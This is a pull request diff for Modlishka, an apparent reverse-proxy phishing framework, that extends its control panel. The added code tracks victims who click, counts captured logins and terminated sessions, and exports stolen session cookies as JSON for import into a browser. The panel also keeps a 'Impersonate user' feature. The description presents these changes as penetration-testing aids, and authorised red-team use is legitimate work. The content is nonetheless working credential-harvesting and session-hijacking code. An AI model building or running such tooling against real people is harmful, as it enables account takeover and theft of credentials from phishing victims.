### PR TITLE
Control Plugin Enhancements

### DIFF
--- a/README.md
+++ b/README.md
@@ -89,7 +89,13 @@ Compile the binary and you are ready to go:
       
       -config string
         	JSON configuration file. Convenient instead of using command line switches.
-      
+          
+      -controlCreds string
+          Username and password to protect the credentials page.  user:pass format
+          
+      -controlURL string
+          URL to view captured credentials and settings. (default "SayHello2Modlishka")
+          
       -credParams string
           	Credential regexp with matching groups. e.g. : baase64(username_regex),baase64(password_regex)
 

--- a/core/proxy.go
+++ b/core/proxy.go
@@ -243,7 +243,8 @@ func (httpResponse *HTTPResponse) PatchHeaders(p *ReverseProxy) {
 	}
 
 	if p.Terminate {
-		log.Infof("Terminating session")
+		log.Infof("Terminating session for %s", p.RequestContext.UserID)
+		p.RequestContext.InvokeTerminateUserHooks(p.RequestContext.UserID)
 
 		// Set Terminator Cookie
 		value := runtime.TERMINATE_SESSION_COOKIE_NAME + "=" + runtime.TERMINATE_SESSION_COOKIE_VALUE +

--- a/plugin/control.go
+++ b/plugin/control.go
@@ -264,7 +264,7 @@ type CookieJar struct {
 }
 
 var credentialParameters = flag.String("credParams", "", "Credential regexp with matching groups. e.g. : baase64(username_regex),baase64(password_regex)")
-var controlURL = flag.String("controlURL", "SayHello2Modlishka", "URL to view captured credentials and settings.  Defaults to SayHello2Modlishka")
+var controlURL = flag.String("controlURL", "SayHello2Modlishka", "URL to view captured credentials and settings.")
 var controlCredentials = flag.String("controlCreds", "", "Username and password to protect the credentials page.  user:pass format")
 
 var CConfig ControlConfig

--- a/plugin/control.go
+++ b/plugin/control.go
@@ -946,14 +946,16 @@ func init() {
 
 		if CConfig.active {
 
-			// Save every new ID that comes to the site
-			victim := Victim{UUID: context.UserID}
-			_, err := CConfig.getEntry(&victim)
-			// Entry doesn't exist yet
-			if err != nil {
-				if err := CConfig.updateEntry(&victim); err != nil {
-					log.Infof("Error %s", err.Error())
-					return
+			if context.UserID != "" {
+				// Save every new ID that comes to the site
+				victim := Victim{UUID: context.UserID}
+				_, err := CConfig.getEntry(&victim)
+				// Entry doesn't exist yet
+				if err != nil {
+					if err := CConfig.updateEntry(&victim); err != nil {
+						log.Infof("Error %s", err.Error())
+						return
+					}
 				}
 			}
 

--- a/plugin/control.go
+++ b/plugin/control.go
@@ -21,6 +21,7 @@ import (
 	"flag"
 	"fmt"
 	"github.com/drk1wi/Modlishka/config"
+	"github.com/drk1wi/Modlishka/runtime"
 	"github.com/drk1wi/Modlishka/log"
 	"github.com/tidwall/buntdb"
 	"html/template"
@@ -37,6 +38,9 @@ import (
 type ExtendedControlConfiguration struct {
 	*config.Options
 	CredParams *string `json:"CredParams"`
+	ControlURL *string `json:"ControlURL"`
+	ControlUser *string `json:"controlUser"`
+	ControlPass *string `json:"controlPass"`
 }
 
 type ControlConfig struct {
@@ -44,14 +48,15 @@ type ControlConfig struct {
 	usernameRegexp *regexp.Regexp
 	passwordRegexp *regexp.Regexp
 	active         bool
+	url            string
+	controlUser    string
+	controlPass    string
 }
 
 type RequetCredentials struct {
 	usernameFieldValue string
 	passwordFieldValue string
 }
-
-const URL = `SayHello2Modlishka`
 
 var htmltemplate = `<!DOCTYPE html>
 <html lang="en">
@@ -86,24 +91,48 @@ function clearcookies(){
 <body>
 
 <div class="container">
-  <h2>Collected user credentials</h2>
+  <h1>Victims</h1>
+  <div class="row">
+  	<div class="col-md-4 text-center">
+  		<h2>Clicks</h2>
+  		<p style="font-size: 2em;">{{len .Victims}}</p>
+  	</div>
+  	<div class="col-md-4 text-center">
+  		<h2>Logins</h2>
+  		<p style="font-size: 2em;">{{.CredsCount}} ({{printf "%.1f" .CredsPercent}}%)</p>
+  	</div>
+  	<div class="col-md-4 text-center">
+  		<h2>Terminations</h2>
+  		<p style="font-size: 2em;">{{.TermCount}} ({{printf "%.1f" .TermPercent}}%)</p>
+  	</div>
+  </div>
   <table class="table table-dark">
     <thead class="thead-dark">
       <tr>
-        <th>UUID</th>
-        <th>Username</th>
-        <th>Password</th>
-        <th>Session</th>
+        <th class="text-center">UUID</th>
+        <th class="text-center">Username</th>
+        <th class="text-center">Password</th>
+        <th class="text-center">Terminated</th>
+        <th class="text-center">Session</th>
+        <th class="text-center">Cookies</th>
 
       </tr>
     </thead>
     <tbody>
-    {{range .}}
+    {{range .Victims}}
       <tr>
         <td>{{.UUID}}</td>
         <td>{{.Username}}</td>
         <td>{{.Password}}</td>
-        <td><a onclick="clearcookies();" href="/` + URL + `/ImpersonateFrames?user_id={{.UUID}}" target="_blank" id="code" type="submit" class="btn btn-warning">Impersonate user (beta)</a>
+        <td class="text-center">
+        {{if .Terminated}}
+        <span style="color: green; font-weight: bold;">Y</span>
+        {{else}}
+        <span style="color: red; font-weight: bold;">N</span>
+        {{end}}
+        </td>
+        <td><a onclick="clearcookies();" href="/{{$.URL}}/ImpersonateFrames?user_id={{.UUID}}" target="_blank" id="code" type="submit" class="btn btn-warning">Impersonate user (beta)</a>
+        <td><a  href="/{{$.URL}}/Cookies?user_id={{.UUID}}" target="_blank" id="code" type="submit" class="btn btn-info">View Cookies</a>
 		</td>
 
       </tr>
@@ -184,19 +213,51 @@ setTimeout(function() {document.location='/'; }, 5000);
 </html>
 `
 
+var cookietemplate = `<!DOCTYPE html>
+<html lang="en">
+<head>
+  <title>Modlishka Control Panel v.0.1 (beta)</title>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
+  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
+  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
+</head>
+<body>
+
+<div class="container">
+  <h2>Cookies</h2>
+  {{ . }}
+</div>
+
+</body>
+</html>
+`
+
 type Victim struct {
 	UUID     string
 	Username string
 	Password string
 	Session  string
+	Terminated bool
 }
+
 type Cookie struct {
-	Name     string    `json:"name"`
-	Value    string    `json:"value"`
-	Domain   string    `json:"domain"`
-	Secure   bool      `json:"secure"`
-	HTTPOnly bool      `json:"httponly"`
-	Expires  time.Time `json:"expires"`
+	Name  string `json:"name"`
+	Value string `json:"value"`
+
+	Path       string `json:"path"`
+	Domain     string `json:"domain"`
+	Expires    time.Time `json:"expire"`
+	RawExpires string 
+
+	// MaxAge=0 means no 'Max-Age' attribute specified.
+	// MaxAge<0 means delete cookie now, equivalently 'Max-Age: 0'
+	// MaxAge>0 means Max-Age attribute present and given in seconds
+	MaxAge   int 
+	Secure   bool `json:"secure"`
+	HttpOnly bool `json:"httpOnly"`
+	SameSite http.SameSite
 }
 
 type CookieJar struct {
@@ -290,11 +351,15 @@ func (victim *Victim) setCookies(cookies []*http.Cookie, url *url.URL) error {
 	for _, v := range cookies {
 		c := Cookie{
 			Name:     v.Name,
-			Domain:   v.Domain,
 			Value:    v.Value,
+			Path:   v.Path,
+			Domain:   v.Domain,
 			Expires:  v.Expires,
-			HTTPOnly: v.HttpOnly,
+			RawExpires:  v.RawExpires,
+			MaxAge:  v.MaxAge,
+			HttpOnly: v.HttpOnly,
 			Secure:   v.Secure,
+			SameSite:   v.SameSite,
 		}
 
 		jar.setCookie(&c)
@@ -424,6 +489,10 @@ func (config *ControlConfig) updateEntry(victim *Victim) error {
 		entry.Session = victim.Session
 	}
 
+	if victim.Terminated {
+		entry.Terminated = true
+	}
+
 	err = config.addEntry(entry)
 	if err != nil {
 		return err
@@ -520,9 +589,39 @@ func HelloHandler(w http.ResponseWriter, r *http.Request) {
 	w.WriteHeader(http.StatusOK)
 	w.Header().Set("Content-Type", "application/json")
 	victims, _ := CConfig.listEntries()
+	credsCount := 0
+	for _, v := range victims {
+		if v.Password != "" {
+			credsCount += 1
+		}
+	}
+	termCount := 0
+	for _, v := range victims {
+		if v.Terminated {
+			termCount += 1
+		}
+	}
+	data := struct {
+        Victims   []Victim
+        CredsCount int
+        TermCount int
+        CredsPercent float64
+        TermPercent float64
+        URL string
+    }{
+        victims,
+        credsCount,
+        termCount,
+        float64(credsCount) / float64(len(victims)) * 100,
+        float64(termCount) / float64(len(victims)) * 100,
+        CConfig.url,
+    }
 	t := template.New("modlishka")
 	t, _ = t.Parse(htmltemplate)
-	_ = t.Execute(w, victims)
+	err := t.Execute(w, data)
+	if err != nil {
+		log.Errorf("Error %s", err)
+	}
 
 	//v,_ :=json.Marshal(&victims)
 	//io.WriteString(w,string(v))
@@ -563,7 +662,7 @@ func HelloHandlerImpersonate(w http.ResponseWriter, r *http.Request) {
 				cookie = cookie + ";Secure"
 			}
 
-			if v.HTTPOnly {
+			if v.HttpOnly {
 				cookie = cookie + ";HttpOnly"
 			}
 
@@ -617,7 +716,7 @@ func HelloHandlerImpersonateFrames(w http.ResponseWriter, r *http.Request) {
 
 	var iframes []string
 	for k, _ := range domains {
-		iframes = append(iframes, "https://"+k+"/"+URL+"/Impersonate?user_id="+users[0])
+		iframes = append(iframes, "https://"+k+"/"+CConfig.url+"/Impersonate?user_id="+users[0])
 	}
 
 	w.WriteHeader(http.StatusOK)
@@ -628,6 +727,95 @@ func HelloHandlerImpersonateFrames(w http.ResponseWriter, r *http.Request) {
 	t, _ = t.Parse(iframetemplate)
 	_ = t.Execute(w, iframes)
 
+}
+
+func HelloHandlerCookieDisplay(w http.ResponseWriter, r *http.Request) {
+
+	users, ok := r.URL.Query()["user_id"]
+
+	if !ok || len(users[0]) < 1 {
+		log.Infof("Url Param 'users_id' is missing")
+		return
+	}
+
+	victim := Victim{UUID: users[0], Username: "", Password: "", Session: ""}
+	entry, err := CConfig.getEntry(&victim)
+	if err != nil {
+		log.Infof("Error %s", err.Error())
+		return
+	}
+	var jar = CookieJar{}
+	err = json.Unmarshal([]byte(entry.Session), &jar)
+	if err != nil {
+		log.Infof("Error %s", err.Error())
+		return
+	}
+
+	var cookies []Cookie
+	for _, v := range jar.Cookies {
+		newCookie := v
+		newCookie.Domain = runtime.PhishURLToRealURL(v.Domain)
+		cookies = append(cookies, *v)
+	}
+
+	cookiesByte, err := json.Marshal(cookies)
+	cookiesOut := string(cookiesByte)
+
+	w.WriteHeader(http.StatusOK)
+
+	w.Header().Set("Content-Type", "application/html")
+
+	t := template.New("modlishkacookiejson")
+	t, _ = t.Parse(cookietemplate)
+	_ = t.Execute(w, cookiesOut)
+
+}
+
+// Copied from https://gist.github.com/elithrar/9146306
+func use(h http.HandlerFunc, middleware ...func(http.HandlerFunc) http.HandlerFunc) http.HandlerFunc {
+	for _, m := range middleware {
+		h = m(h)
+	}
+
+	return h
+}
+
+// Based on https://gist.github.com/elithrar/9146306
+func basicAuth(h http.HandlerFunc) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+
+		if CConfig.controlUser == "" {
+			h.ServeHTTP(w, r)
+			return
+		}
+
+		w.Header().Set("WWW-Authenticate", `Basic realm="Restricted"`)
+
+		s := strings.SplitN(r.Header.Get("Authorization"), " ", 2)
+		if len(s) != 2 {
+			http.Error(w, "Not authorized", 401)
+			return
+		}
+
+		b, err := base64.StdEncoding.DecodeString(s[1])
+		if err != nil {
+			http.Error(w, err.Error(), 401)
+			return
+		}
+
+		pair := strings.SplitN(string(b), ":", 2)
+		if len(pair) != 2 {
+			http.Error(w, "Not authorized", 401)
+			return
+		}
+
+		if pair[0] != CConfig.controlUser || pair[1] != CConfig.controlPass {
+			http.Error(w, "Not authorized", 401)
+			return
+		}
+
+		h.ServeHTTP(w, r)
+	}
 }
 
 func init() {
@@ -688,6 +876,20 @@ func init() {
 
 		}
 
+		if jsonConfig.ControlURL != nil {
+			CConfig.url = *jsonConfig.ControlURL
+		} else {
+			CConfig.url = "SayHello2Modlishka"
+		}
+
+		if jsonConfig.ControlUser != nil || jsonConfig.ControlPass != nil {
+			if jsonConfig.ControlUser == nil || jsonConfig.ControlPass == nil {
+				log.Fatalf("controlUser and controlPass must both have values")
+			}
+			CConfig.controlUser = *jsonConfig.ControlUser
+			CConfig.controlPass = *jsonConfig.ControlPass
+		}
+
 		if jsonConfig.CredParams != nil {
 			creds = strings.Split(*jsonConfig.CredParams, ",")
 		} else if *credentialParameters != "" {
@@ -720,12 +922,13 @@ func init() {
 	// Register your http handlers
 	s.RegisterHandler = func(handler *http.ServeMux) {
 
-		handler.HandleFunc("/"+URL+"/", HelloHandler)
-		handler.HandleFunc("/"+URL+"/ImpersonateFrames", HelloHandlerImpersonateFrames)
-		handler.HandleFunc("/"+URL+"/Impersonate", HelloHandlerImpersonate)
+		handler.HandleFunc("/"+CConfig.url+"/", use(HelloHandler, basicAuth))
+		handler.HandleFunc("/"+CConfig.url+"/ImpersonateFrames", use(HelloHandlerImpersonateFrames, basicAuth))
+		handler.HandleFunc("/"+CConfig.url+"/Impersonate", use(HelloHandlerImpersonate, basicAuth))
+		handler.HandleFunc("/"+CConfig.url+"/Cookies", use(HelloHandlerCookieDisplay, basicAuth))
 
-		log.Infof("Control Panel: " + URL + " handler registered	")
-		log.Infof("Control Panel URL: /" + URL)
+		log.Infof("Control Panel: " + CConfig.url + " handler registered	")
+		log.Infof("Control Panel URL: " + *config.C.ProxyDomain + "/" + CConfig.url)
 
 	}
 
@@ -733,6 +936,17 @@ func init() {
 	s.HTTPRequest = func(req *http.Request, context *HTTPContext) {
 
 		if CConfig.active {
+
+			// Save every new ID that comes to the site
+			victim := Victim{UUID: context.UserID}
+			_, err := CConfig.getEntry(&victim)
+			// Entry doesn't exist yet
+			if err != nil {
+				if err := CConfig.updateEntry(&victim); err != nil {
+					log.Infof("Error %s", err.Error())
+					return
+				}
+			}
 
 			if creds, found := CConfig.checkRequestCredentials(req); found {
 
@@ -810,6 +1024,17 @@ func init() {
 				return
 			}
 
+		}
+
+	}
+
+	s.TerminateUser = func(userID string){
+		log.Infof("Invoking control terminate")
+		victim := Victim{UUID: userID, Terminated: true}
+		err := CConfig.updateEntry(&victim)
+		if err != nil {
+			log.Errorf("Error %s", err)
+			return
 		}
 
 	}

--- a/plugin/core_plugin.go
+++ b/plugin/core_plugin.go
@@ -38,6 +38,7 @@ type Property struct {
 	Flags           func()
 	HTTPRequest     func(req *http.Request, context *HTTPContext)
 	HTTPResponse    func(resp *http.Response, context *HTTPContext,buffer *[]byte)
+	TerminateUser    func(userID string)
 	RegisterHandler func(handler *http.ServeMux)
 }
 
@@ -152,4 +153,14 @@ func (context *HTTPContext) InvokeHTTPResponseHooks(resp *http.Response, buffer 
 			p.HTTPResponse(resp, context,buffer)
 		}
 	}
+}
+
+// Execute plugin-defined Terminate User hooks
+func (context *HTTPContext) InvokeTerminateUserHooks(userID string) {
+	for _, p := range Plugins {
+		if p.Active && p.TerminateUser != nil {
+			p.TerminateUser(userID)
+		}
+	}
+
 }

--- a/runtime/func.go
+++ b/runtime/func.go
@@ -126,12 +126,13 @@ func RealURLtoPhish(realURL string) string {
 		out = strings.Replace(out, host, encoded+"."+ProxyDomain, 1)
 	} else {
 
-	if strings.Contains(realURL,  TopLevelDomain) { //subdomain in main domain
-		out = strings.Replace(out, string( TopLevelDomain), ProxyDomain, 1)
-	} else if realURL != "" {
-		encoded, _ :=  EncodeSubdomain(host,tls)
-		out = strings.Replace(out, host, encoded+"."+ProxyDomain, 1)
-	}}
+		if strings.Contains(realURL,  TopLevelDomain) { //subdomain in main domain
+			out = strings.Replace(out, string( TopLevelDomain), ProxyDomain, 1)
+		} else if realURL != "" {
+			encoded, _ :=  EncodeSubdomain(host,tls)
+			out = strings.Replace(out, host, encoded+"."+ProxyDomain, 1)
+		}
+	}
 
 	return out
 }
@@ -173,6 +174,8 @@ func PhishURLToRealURL(phishURL string) string {
 
 //check if the requested URL matches termination URLS patterns and returns verdict
 func CheckTermination(input string) bool {
+
+	input = PhishURLToRealURL(input)
 
 	if len(TerminateTriggers) > 0 {
 		for _, pattern := range TerminateTriggers {


### PR DESCRIPTION
Enhance the control plugin to add features that are useful to real-world penetration tests.  This includes:

- Track everyone who visits the phishing domain for click counts
- Track which victims have their sessions terminated
    - This included adding a TerminateUser hook for plugins
    - Also fixed an apparent bug where the check for termination function was comparing to the Phish URL instead of the real URL
- Add a page to view captured cookies in JSON format for easy import into browsers
    - This included modifying the Cookie struct to track additional information
- View number of victims, credentials captured, and terminated sessions all on the control page
- Add the ability to change the control URL from "SayHello2Modlishka"
- Add the ability to add a username/password to the control URL
